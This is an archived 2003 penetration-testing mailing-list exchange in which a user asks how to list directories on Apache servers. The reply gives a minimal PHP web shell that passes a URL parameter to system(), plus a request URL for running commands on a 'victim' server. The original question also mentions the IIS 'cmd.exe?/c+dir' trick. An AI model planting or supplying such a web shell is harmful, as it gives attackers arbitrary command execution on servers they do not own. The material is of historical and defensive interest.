|
Penetration Testing
mailing list archives
RE: Directory listing
From: "Maher Odeh" <rax () netvision net il>
Date: Sun, 11 May 2003 11:33:24 +0200
Hey
to answer your question , Yes same thing can be accomplished on any platform or any webserver
if you can inject the following script to an apache server running php , you will be able to execute any command
for example ls -la / and see the directories etc ...
Ex :
<? php
system($arg);
?>
after you inject this file, lets say you called it break.php do the following :
"http://www.victim.com/break.php?arg=/bin/ls";
you will get the directories and files etc ...
-----Original Message-----
From: John Madden [mailto:chiwawa999 () yahoo com]
Sent: Monday, May 05, 2003 8:32 PM
To: pen-test () securityfocus com
Subject: Directory listing
Hi,
In IIS/4 or 5 you can use the cmd.exe?/c+dir to get
the directory of a machine how can the same be
accomplish on other types of web server like Apache ?
Can this be accomplished with a cgi or perl script ?
Thanks
John
__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com
---------------------------------------------------------------------------
Did you know that you have VNC running on your network?
Your hacker does.
Plug your security holes.
Download a free 15-day trial of VAM:
http://www.securityfocus.com/StillSecure-pen-test
----------------------------------------------------------------------------
---------------------------------------------------------------------------
Did you know that you have VNC running on your network?
Your hacker does.
Plug your security holes.
Download a free 15-day trial of VAM:
http://www.securityfocus.com/StillSecure-pen-test
----------------------------------------------------------------------------
 By Date 
By Thread
Current thread:
- Directory listing John Madden (May 08)
- <Possible follow-ups>
- RE: Directory listing Maher Odeh (May 11)
|
Intro
